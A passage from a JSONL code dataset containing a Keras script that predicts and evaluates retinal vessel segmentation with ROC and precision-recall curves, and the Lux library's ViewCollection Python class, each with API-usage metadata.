"line_number": 17, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 17, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 28, "usage_type": "call"}, {"api_name": "project.app.config", "line_number": 31, "usage_type": "attribute"}, {"api_name": "project.app", "line_number": 31, "usage_type": "name"}, {"api_name": "project.app.route", "line_number": 13, "usage_type": "call"}, {"api_name": "project.app", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 37, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 35, "usage_type": "call"}, {"api_name": "project.app", "line_number": 35, "usage_type": "name"}, {"api_name": "flask_babelex.gettext", "line_number": 42, "usage_type": "call"}, {"api_name": "project.services.admin.upsert_settings", "line_number": 43, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 40, "usage_type": "call"}, {"api_name": "project.app", "line_number": 40, "usage_type": "name"}, {"api_name": "flask_babelex.gettext", "line_number": 50, "usage_type": "call"}, {"api_name": "project.services.admin.upsert_settings", "line_number": 51, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 53, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 48, "usage_type": "call"}, {"api_name": "project.app", "line_number": 48, "usage_type": "name"}, {"api_name": "flask_babelex.gettext", "line_number": 58, "usage_type": "call"}, {"api_name": "project.services.admin.upsert_settings", "line_number": 59, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 56, "usage_type": "call"}, {"api_name": "project.app", "line_number": 56, "usage_type": "name"}, {"api_name": "flask_babelex.gettext", "line_number": 66, "usage_type": "call"}, {"api_name": "project.services.admin.upsert_settings", "line_number": 67, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 69, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 64, "usage_type": "call"}, {"api_name": "project.app", "line_number": 64, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "project.dump_path", "line_number": 75, "usage_type": "argument"}, {"api_name": "os.path.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.path.getsize", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.path.getctime", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 82, "usage_type": "name"}, {"api_name": "project.app.logger.info", "line_number": 85, "usage_type": "call"}, {"api_name": "project.app.logger", "line_number": 85, "usage_type": "attribute"}, {"api_name": "project.app", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 72, "usage_type": "call"}, {"api_name": "project.app", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 92, "usage_type": "call"}, {"api_name": "project.app.static_folder", "line_number": 92, "usage_type": "attribute"}, {"api_name": "project.app", "line_number": 92, "usage_type": "name"}, {"api_name": "flask.request.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "project.app.route", "line_number": 90, "usage_type": "call"}, {"api_name": "project.app", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 97, "usage_type": "call"}, {"api_name": "project.cache_path", "line_number": 97, "usage_type": "argument"}, {"api_name": "project.robots_txt_file", "line_number": 97, "usage_type": "argument"}, {"api_name": "project.app.route", "line_number": 95, "usage_type": "call"}, {"api_name": "project.app", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 102, "usage_type": "call"}, {"api_name": "project.cache_path", "line_number": 102, "usage_type": "argument"}, {"api_name": "project.sitemap_file", "line_number": 102, "usage_type": "argument"}, {"api_name": "project.app.route", "line_number": 100, "usage_type": "call"}, {"api_name": "project.app", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "212358478", "text": "###################################################\n#\n# Script to\n# - Calculate prediction of the test dataset\n# - Calculate the parameters to evaluate the prediction\n#\n##################################################\n\n#Python\nimport numpy as np\nimport configparser\nfrom matplotlib import pyplot as plt\n\n#Keras\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.metrics import BinaryAccuracy, Precision, Recall, TruePositives, TrueNegatives, FalsePositives, FalseNegatives\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.utils import plot_model as plot\n\nimport sys\nsys.path.insert(0, './lib/')\nfrom help_functions import *\nfrom loader import load_testset\nfrom extract_patches import recompone\nfrom extract_patches import recompone_overlap\nfrom nn_utils import *\nfrom unet import get_unet\nfrom resnet import UResNet\n\nsession = K.get_session()\n\n#========= CONFIG FILE TO READ FROM =======\nconfig = configparser.RawConfigParser()\nconfig.read('configuration.txt')\n\npath_data = config.get('data paths', 'path_local')\ntest_data_path = config.get('data paths', 'test_data_path')\ntest_data_stats = config.get('data paths', 'test_data_stats')\n\nstats_config = configparser.RawConfigParser()\nstats_config.read(test_data_stats)\nfull_img_height = int(stats_config.get('statistics', 'new_image_height'))\nfull_img_width = int(stats_config.get('statistics', 'new_image_width'))\n\n# dimension of the patches\npatch_size = (int(config.get('data attributes', 'patch_height')), int(config.get('data attributes', 'patch_width')))\n\n#the stride in case output with average\nstride_size = (int(config.get('testing settings', 'stride_height')), int(config.get('testing settings', 'stride_width')))\nassert (stride_size[0] < patch_size[0] and stride_size[1] < patch_size[1])\n\n#model name\nname_experiment = config.get('experiment', 'name')\narch = config.get('experiment', 'arch')\ntestset = config.get('experiment', 'testset')\nexperiment_path = path_data + '/' + name_experiment + '_' + arch\nsave_path = experiment_path + '/' + testset\n\nu_net = arch == 'unet'\n\n#N full images to be predicted\nimgs_to_visualize = int(config.get('testing settings', 'imgs_to_visualize'))\nN_subimgs = int(config.get('testing settings', 'N_subimgs'))\npatches_per_img = int(stats_config.get('statistics', 'subimages_per_image'))\n\n#Grouping of the predicted images\nN_visual = int(config.get('testing settings', 'N_group_visual'))\nbatch_size = int(config.get('training settings', 'batch_size'))\n\n\n#================= Load the data =====================================================\ndataset = load_testset(test_data_path, batch_size)\niterator = dataset.make_one_shot_iterator()\n\nn_samples = int(patches_per_img * imgs_to_visualize)\nbatches = int(np.ceil(n_samples / batch_size))\npatches_embedding = np.zeros((batches * batch_size, 1, patch_size[0], patch_size[1]))\npatches_embedding_gt = np.zeros((batches * batch_size, 1, patch_size[0], patch_size[1]))\n\nbatch_img, batch_gt = iterator.get_next()\nprint('loading visualization data')\nfor i in range(batches):\n if i % 50 == 0:\n print(str(i) + ' / ' + str(batches))\n batch_gt_np = tf.reshape(batch_gt[:, 1], (batch_size, 1, patch_size[0], patch_size[1]))\n batch_img_np, batch_gt_np = session.run([batch_img, batch_gt_np])\n patches_embedding[i * batch_size: i * batch_size + batch_size] = batch_img_np\n patches_embedding_gt[i * batch_size: i * batch_size + batch_size] = batch_gt_np\n\npatches_embedding = (patches_embedding[:n_samples] + 3.) / 6.\npatches_embedding_gt = patches_embedding_gt[:n_samples]\n\n\norig_imgs = recompone_overlap(\n patches_embedding,\n full_img_height,\n full_img_width,\n stride_size[0],\n stride_size[1]\n) * 255\ngtruth_masks = recompone_overlap(\n patches_embedding_gt,\n full_img_height,\n full_img_width,\n stride_size[0],\n stride_size[1]\n) * 255\n\n#================ Run the prediction of the patches ==================================\nbest_last = config.get('testing settings', 'best_last')\n\n#Load the saved model\nif u_net:\n model = get_unet(1, batch_size, patch_size[0], patch_size[1], with_activation=True) #the U-net model\nelse:\n model = UResNet(input_shape=(1, patch_size[0], patch_size[1]), with_activation=True)\n\nthresholds = np.linspace(0, 1, 200).tolist()\nmodel.compile(\n optimizer = 'sgd',\n loss = weighted_cross_entropy(9),\n metrics = [\n BinaryAccuracy(),\n TruePositives(thresholds = thresholds),\n FalsePositives(thresholds = thresholds),\n TrueNegatives(thresholds = thresholds),\n FalseNegatives(thresholds = thresholds) # confusion\n ]\n)\nplot(model, to_file = experiment_path + '/' + name_experiment + '_model_test.png') #check how the model looks like\nprint(experiment_path + '/' + name_experiment + '_' + best_last + '_weights.h5')\nmodel.load_weights(experiment_path + '/' + name_experiment + '_' + best_last + '_weights.h5')\n\nprint(\"start prediction\")\n#Calculate the predictions\nsamples_to_predict = np.ceil(patches_per_img * imgs_to_visualize / batch_size) * batch_size\npredictions = model.predict(\n dataset.take(samples_to_predict),\n batch_size = batch_size,\n steps = int(samples_to_predict / batch_size)\n)\n\npredictions = predictions[:patches_per_img * imgs_to_visualize]\n\n#===== Convert the prediction arrays in corresponding images\n\npred_patches = pred_to_imgs(predictions, patch_size[0], patch_size[1], \"original\")\n\n# #========== Elaborate and visualize the predicted images ====================\npred_imgs = recompone_overlap(\n pred_patches,\n full_img_height,\n full_img_width,\n stride_size[0],\n stride_size[1]\n) * 255\n\nassert(np.max(pred_imgs) <= 255)\nassert(np.min(pred_imgs) >= 0)\n\nprint(\"Orig imgs shape: \" +str(orig_imgs.shape))\nprint(\"pred imgs shape: \" +str(pred_imgs.shape))\nprint(\"Gtruth imgs shape: \" +str(gtruth_masks.shape))\nvisualize(group_images(orig_imgs, N_visual), save_path + \"_all_originals\")#.show()\nvisualize(group_images(pred_imgs, N_visual), save_path + \"_all_predictions\")#.show()\nvisualize(group_images(gtruth_masks,N_visual), save_path + \"_all_groundTruths\")#.show()\n#visualize results comparing mask and prediction:\nassert(orig_imgs.shape[0]==pred_imgs.shape[0] and orig_imgs.shape[0]==gtruth_masks.shape[0])\nN_predicted = orig_imgs.shape[0]\ngroup = N_visual\nassert (N_predicted % group==0)\nfor i in range(int(N_predicted/group)):\n fr = i * group\n to = i * group + group\n orig_stripe = group_images(orig_imgs[fr: to], group)\n masks_stripe = group_images(gtruth_masks[fr: to], group)\n pred_stripe = group_images(pred_imgs[fr: to], group)\n total_img = np.concatenate((orig_stripe, masks_stripe, pred_stripe), axis=0)\n visualize(total_img, save_path + \"_Original_GroundTruth_Prediction\" + str(i))#.show()\n\n#========================== Evaluate the results ===================================\nprint(\"\\n\\n======== Evaluate the results =======================\")\n\neval_values = model.evaluate(\n dataset,\n batch_size = batch_size,\n steps = int(N_subimgs / batch_size),\n verbose = 1\n)\n\n_, acc, true_positives, false_positives, true_negatives, false_negatives = eval_values\n\n# Area under the ROC curve\ntpr = true_positives / (true_positives + false_negatives)\nfpr = false_positives / (false_positives + true_negatives)\nroc_curve = plt.figure()\nplt.plot(fpr,tpr,'-',label='Area Under the Curve' )\nplt.title('ROC curve')\nplt.xlabel(\"FPR (False Positive Rate)\")\nplt.ylabel(\"TPR (True Positive Rate)\")\nplt.legend(loc = \"lower right\")\nplt.savefig(save_path + \"_ROC.png\")\n\n# Precision-recall curve\n# print(\"\\nArea under Precision-Recall curve: \" +str(AUC_prec_rec))\nprecision = true_positives / (true_positives + false_positives)\nprec_rec_curve = plt.figure()\nplt.plot(tpr, precision, '-', label = 'Area Under the Curve')\nplt.title('Precision - Recall curve')\nplt.xlabel(\"Recall\")\nplt.ylabel(\"Precision\")\nplt.legend(loc = \"lower right\")\nplt.savefig(save_path + \"_Precision_recall.png\")\n\n# Confusion matrix (take threshold of 0.5)\nconfusion = np.array([[true_positives[99], false_positives[99]], [false_negatives[99], true_negatives[99]]])\nconfusion /= np.sum(confusion)\nprint(confusion)\n\nif float(np.sum(confusion))!=0:\n accuracy = float(confusion[0,0]+confusion[1,1])/float(np.sum(confusion))\nprint(\"Global Accuracy: \" +str(accuracy))\nspecificity = 0\nif float(confusion[0,0]+confusion[0,1])!=0:\n specificity = float(confusion[0,0])/float(confusion[0,0]+confusion[0,1])\nprint(\"Specificity: \" +str(specificity))\nsensitivity = 0\nif float(confusion[1,1]+confusion[1,0])!=0:\n sensitivity = float(confusion[1,1])/float(confusion[1,1]+confusion[1,0])\nprint(\"Sensitivity: \" +str(sensitivity))\nprecision = 0\nif float(confusion[1,1]+confusion[0,1])!=0:\n precision = float(confusion[1,1])/float(confusion[1,1]+confusion[0,1])\nprint(\"Precision: \" +str(precision))\n\n#Save the results\nwith open(save_path + '_performances.txt', 'w') as file:\n file.write(\n \"Confusion matrix:\\n\"\n + str(confusion)\n + \"\\nACCURACY: \" + str(accuracy)\n + \"\\nSENSITIVITY: \" + str(sensitivity)\n + \"\\nSPECIFICITY: \" + str(specificity)\n + \"\\nPRECISION: \" + str(precision)\n )\n file.close()\n", "sub_path": "src/retinaNN_predict.py", "file_name": "retinaNN_predict.py", "file_ext": "py", "file_size_in_byte": 9224, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.insert", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.backend.get_session", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 32, "usage_type": "name"}, {"api_name": "configparser.RawConfigParser", "line_number": 35, "usage_type": "call"}, {"api_name": "configparser.RawConfigParser", "line_number": 42, "usage_type": "call"}, {"api_name": "loader.load_testset", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 87, "usage_type": "call"}, {"api_name": "extract_patches.recompone_overlap", "line_number": 96, "usage_type": "call"}, {"api_name": "extract_patches.recompone_overlap", "line_number": 103, "usage_type": "call"}, {"api_name": "unet.get_unet", "line_number": 116, "usage_type": "call"}, {"api_name": "resnet.UResNet", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.BinaryAccuracy", "line_number": 125, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.TruePositives", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.FalsePositives", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.TrueNegatives", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.FalseNegatives", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.plot_model", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 138, "usage_type": "call"}, {"api_name": "extract_patches.recompone_overlap", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "583180592", "text": "from __future__ import annotations\nfrom lux.vizLib.altair.AltairRenderer import AltairRenderer\nfrom lux.utils.utils import check_import_lux_widget\nfrom typing import List, Union, Callable, Dict\nfrom lux.view.View import View\nfrom lux.context.Spec import Spec\nclass ViewCollection():\n\t'''\n\tViewCollection is a list of View objects. \n\t'''\n\tdef __init__(self,input_lst:Union[List[View],List[Spec]]):\n\t\t# Overloaded Constructor\n\t\tself.input_lst = input_lst\n\t\tif len(input_lst)>0:\n\t\t\tif (self._is_view_input()):\n\t\t\t\tself.collection = input_lst\n\t\t\t\tself.spec_lst = []\n\t\t\telse:\n\t\t\t\tself.spec_lst = input_lst\n\t\t\t\tself.collection = []\n\t\telse:\n\t\t\tself.collection = []\n\t\t\tself.spec_lst = []\n\tdef get_exported(self) -> ViewCollection:\n\t\t\"\"\"\n\t\tGet selected views as exported View Collection\n\n\t\tNotes\n -----\n\t\tConvert the _exportedVisIdxs dictionary into a programmable ViewCollection\n\t\tExample _exportedVisIdxs : \n\t\t\t{'View Collection': [0, 2]}\n\t\t\n\t\tReturns\n\t\t-------\n\t\tViewCollection\n\t\t \treturn a ViewCollection of selected views. -> ViewCollection(v1, v2...)\n\t\t\"\"\" \n\t\t\n\t\texported_vis_lst =self.widget._exportedVisIdxs\n\t\tif (exported_vis_lst=={}):\n\t\t\timport warnings\n\t\t\twarnings.warn(\"No visualization selected to export\")\n\t\t\treturn []\n\t\telse:\n\t\t\texported_views = ViewCollection(list(map(self.__getitem__, exported_vis_lst[\"View Collection\"])))\n\t\t\treturn exported_views\n\tdef remove_duplicates(self) -> None: \n\t\t\"\"\"\n\t\tRemoves duplicate views in View collection\n\t\t\"\"\"\t\t\n\t\tself.collection = list(set(self.collection))\n\tdef _is_view_input(self):\n\t\tif (type(self.input_lst[0])==View):\n\t\t\treturn True\n\t\telif (type(self.input_lst[0])==Spec):\n\t\t\treturn False\n\tdef __getitem__(self, key):\n\t\treturn self.collection[key]\n\tdef __setitem__(self, key, value):\n\t\tself.collection[key] = value\n\tdef __len__(self):\n\t\treturn len(self.collection)\n\tdef __repr__(self):\n\t\tif len(self.collection) == 0:\n\t\t\treturn str(self.input_lst)\n\t\tx_channel = \"\"\n\t\ty_channel = \"\"\n\t\tlargest_mark = 0\n\t\tlargest_filter = 0\n\t\tfor view in self.collection: #finds longest x attribute among all views\n\t\t\tfilter_spec = None\n\t\t\tfor spec in view.spec_lst:\n\t\t\t\tif spec.value != \"\":\n\t\t\t\t\tfilter_spec = spec\n\n\t\t\t\tif spec.aggregation != \"\":\n\t\t\t\t\tattribute = spec.aggregation.upper() + \"(\" + spec.attribute + \")\"\n\t\t\t\telif spec.bin_size > 0:\n\t\t\t\t\tattribute = \"BIN(\" + spec.attribute + \")\"\n\t\t\t\telse:\n\t\t\t\t\tattribute = spec.attribute\n\n\t\t\t\tif spec.channel == \"x\" and len(x_channel) < len(attribute):\n\t\t\t\t\tx_channel = attribute\n\t\t\t\tif spec.channel == \"y\" and len(y_channel) < len(attribute):\n\t\t\t\t\ty_channel = attribute\n\t\t\tif len(view.mark) > largest_mark:\n\t\t\t\tlargest_mark = len(view.mark)\n\t\t\tif filter_spec and len(str(filter_spec.value)) + len(filter_spec.attribute) > largest_filter:\n\t\t\t\tlargest_filter = len(str(filter_spec.value)) + len(filter_spec.attribute) \n\t\tviews_repr = []\n\t\tlargest_x_length = len(x_channel)\n\t\tlargest_y_length = len(y_channel)\n\t\tfor view in self.collection: #pads the shorter views with spaces before the y attribute\n\t\t\tfilter_spec = None\n\t\t\tx_channel = \"\"\n\t\t\ty_channel = \"\"\n\t\t\tadditional_channels = []\n\t\t\tfor spec in view.spec_lst:\n\t\t\t\tif spec.value != \"\":\n\t\t\t\t\tfilter_spec = spec\n\n\t\t\t\tif spec.aggregation != \"\":\n\t\t\t\t\tattribute = spec.aggregation.upper() + \"(\" + spec.attribute + \")\"\n\t\t\t\telif spec.bin_size > 0:\n\t\t\t\t\tattribute = \"BIN(\" + spec.attribute + \")\"\n\t\t\t\telse:\n\t\t\t\t\tattribute = spec.attribute\n\n\t\t\t\tif spec.channel == \"x\":\n\t\t\t\t\tx_channel = attribute.ljust(largest_x_length)\n\t\t\t\telif spec.channel == \"y\":\n\t\t\t\t\ty_channel = attribute\n\t\t\t\telif spec.channel != \"\":\n\t\t\t\t\tadditional_channels.append([spec.channel, attribute])\n\t\t\tif filter_spec:\n\t\t\t\ty_channel = y_channel.ljust(largest_y_length)\n\t\t\telif largest_filter != 0:\n\t\t\t\ty_channel = y_channel.ljust(largest_y_length + largest_filter + 9)\n\t\t\telse:\n\t\t\t\ty_channel = y_channel.ljust(largest_y_length + largest_filter)\n\t\t\tif x_channel != \"\":\n\t\t\t\tx_channel = \"x: \" + x_channel + \", \"\n\t\t\tif y_channel != \"\":\n\t\t\t\ty_channel = \"y: \" + y_channel\n\t\t\taligned_mark = view.mark.ljust(largest_mark)\n\t\t\tstr_additional_channels = \"\"\n\t\t\tfor channel in additional_channels:\n\t\t\t\tstr_additional_channels += \", \" + channel[0] + \": \" + channel[1]\n\t\t\tif filter_spec:\n\t\t\t\taligned_filter = \" -- [\" + filter_spec.attribute + filter_spec.filter_op + str(filter_spec.value) + \"]\"\n\t\t\t\taligned_filter = aligned_filter.ljust(largest_filter + 8)\n\t\t\t\tviews_repr.append(f\" \") \n\t\t\telse:\n\t\t\t\tviews_repr.append(f\" \") \n\t\treturn '['+',\\n'.join(views_repr)[1:]+']'\n\tdef map(self,function):\n\t\t# generalized way of applying a function to each element\n\t\treturn map(function, self.collection)\n\t\n\tdef get(self,field_name):\n\t\t# Get the value of the field for all objects in the collection\n\t\tdef get_field(d_obj):\n\t\t\tfield_val = getattr(d_obj,field_name)\n\t\t\t# Might want to write catch error if key not in field\n\t\t\treturn field_val\n\t\treturn self.map(get_field)\n\n\tdef set(self,field_name,field_val):\n\t\treturn NotImplemented\n\tdef set_plot_config(self,config_func:Callable):\n\t\t\"\"\"\n\t\tModify plot aesthetic settings to the View Collection\n\t\tCurrently only supported for Altair visualizations\n\n\t\tParameters\n\t\t----------\n\t\tconfig_func : typing.Callable\n\t\t\tA function that takes in an AltairChart (https://altair-viz.github.io/user_guide/generated/toplevel/altair.Chart.html) as input and returns an AltairChart as output\n\t\t\"\"\"\n\t\tfor view in self.collection:\n\t\t\tview.plot_config = config_func\n\tdef clear_plot_config(self):\n\t\tfor view in self.collection:\n\t\t\tview.plot_config = None\n\tdef sort(self, remove_invalid=True, descending = True):\n\t\t# remove the items that have invalid (-1) score\n\t\tif (remove_invalid): self.collection = list(filter(lambda x: x.score!=-1,self.collection))\n\t\t# sort in-place by “score” by default if available, otherwise user-specified field to sort by\n\t\tself.collection.sort(key=lambda x: x.score, reverse=descending)\n\n\tdef topK(self,k):\n\t\t#sort and truncate list to first K items\n\t\tself.sort(remove_invalid=True)\n\t\treturn ViewCollection(self.collection[:k])\n\tdef bottomK(self,k):\n\t\t#sort and truncate list to first K items\n\t\tself.sort(descending=False,remove_invalid=True)\n\t\treturn ViewCollection(self.collection[:k])\n\tdef normalize_score(self, invert_order = False):\n\t\tmax_score = max(list(self.get(\"score\")))\n\t\tfor dobj in self.collection:\n\t\t\tdobj.score = dobj.score/max_score\n\t\t\tif (invert_order): dobj.score = 1 - dobj.score\n\tdef _repr_html_(self):\n\t\tself.widget = None\n\t\tfrom IPython.display import display\n\t\tfrom lux.luxDataFrame.LuxDataframe import LuxDataFrame\n\t\t# widget = LuxDataFrame.render_widget(input_current_view=self,render_target=\"viewCollectionOnly\")\n\t\trecommendation = {\"action\": \"View Collection\",\n\t\t\t\t\t \"description\": \"Shows a view collection defined by the context\"}\n\t\trecommendation[\"collection\"] = self\n\n\t\tcheck_import_lux_widget()\n\t\timport luxWidget\n\t\trecJSON = LuxDataFrame.rec_to_JSON([recommendation])\n\t\tself.widget = luxWidget.LuxWidget(\n\t\t\t\tcurrentView={},\n\t\t\t\trecommendations=recJSON,\n\t\t\t\tcontext={}\n\t\t\t)\n\t\tdisplay(self.widget)\t\n\t\n\tdef load(self, ldf) -> ViewCollection:\n\t\t\"\"\"\n\t\tLoading the data into the views in the ViewCollection by instantiating the specification and populating the view based on the data, effectively \"materializing\" the view.\n\n\t\tParameters\n\t\t----------\n\t\tldf : LuxDataframe\n\t\t\tInput Dataframe to be attached to the ViewCollection\n\n\t\tReturns\n\t\t-------\n\t\tViewCollection\n\t\t\tComplete ViewCollection with fully-specified fields\n\t\t\n\t\tSee Also\n\t\t--------\n\t\tlux.view.View.load\n\t\t\"\"\"\t\t\n\t\tfrom lux.compiler.Parser import Parser\n\t\tfrom lux.compiler.Validator import Validator\n\t\tfrom lux.compiler.Compiler import Compiler\n\t\tfrom lux.executor.PandasExecutor import PandasExecutor #TODO: temporary (generalize to executor)\n\t\tif len(self.input_lst)>0:\n\t\t\tif (self._is_view_input()):\n\t\t\t\tfor view in self.collection:\n\t\t\t\t\tview.spec_lst = Parser.parse(view.spec_lst)\n\t\t\t\t\tValidator.validate_spec(view.spec_lst,ldf)\n\t\t\t\tvc = Compiler.compile(ldf,ldf.context,self,enumerate_collection=False)\n\t\t\telse:\n\t\t\t\tself.spec_lst = Parser.parse(self.spec_lst)\n\t\t\t\tValidator.validate_spec(self.spec_lst,ldf)\n\t\t\t\tvc = Compiler.compile(ldf,self.spec_lst,self)\n\t\t\tPandasExecutor.execute(vc,ldf)\n\t\t\treturn vc\n\t\telse:\n\t\t\treturn self\n", "sub_path": "lux/view/ViewCollection.py", "file_name": "ViewCollection.py", "file_ext": "py", "file_size_in_byte": 8385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.Union", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "lux.view.View.View", "line_number": 11, "usage_type": "name"}, {"api_name": "lux.context.Spec.Spec", "line_number": 11, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 43, "usage_type": "call"}, {"api_name": "lux.view.View.View", "line_number": 54, "usage_type": "name"}, {"api_name": "lux.context.Spec.Spec", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 152, "usage_type": "name"}, {"api_name": "lux.utils.utils.check_import_lux_widget", "line_number": 195, "usage_type": "call"}, {"api_name": "lux.luxDataFrame.LuxDataframe.LuxDataFrame.rec_to_JSON", "line_number": 197, "usage_type": "call"}, {"api_name": "lux.luxDataFrame.LuxDataframe.LuxDataFrame", "line_number": 197, "usage_type": "name"}, {"api_name": "luxWidget.LuxWidget", "line_number": 198, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 203, "usage_type": "call"}, {"api_name": "lux.compiler.Parser.Parser.parse", "line_number": 230, "usage_type": "call"}, {"api_name": "lux.compiler.Parser.Parser", "line_number": 230, "usage_type": "name"}, {"api_name": "lux.compiler.Validator.Validator.validate_spec", "line_number": 231, "usage_type": "call"}, {"api_name": "lux.compiler.Validator.Validator", "line_number": 231, "usage_type": "name"}, {"api_name": "lux.compiler.Compiler.Compiler.compile", "line_number": 232, "usage_type": "call"}, {"api_name": "lux.compiler.Compiler.Compiler", "line_number": 232, "usage_type": "name"}, {"api_name": "lux.compiler.Parser.Parser.parse", "line_number": 234, "usage_type": "call"}, {"api_name": "lux.compiler.Parser.Parser", "line_number": 234, "usage_type": "name"}, {"api_name": "lux.compiler.Validator.Validator.validate_spec", "line_number": 235, "usage_type": "call"}, {"api_name": "lux.compiler.Validator.Validator", "line_number": 235, "usage_type": "name"}, {"api_name": "lux.compiler.Compiler.Compiler.compile", "line_number": 236, "usage_type": "call"}, {"api_name": "lux.compiler.Compiler.Compiler", "line_number": 236, 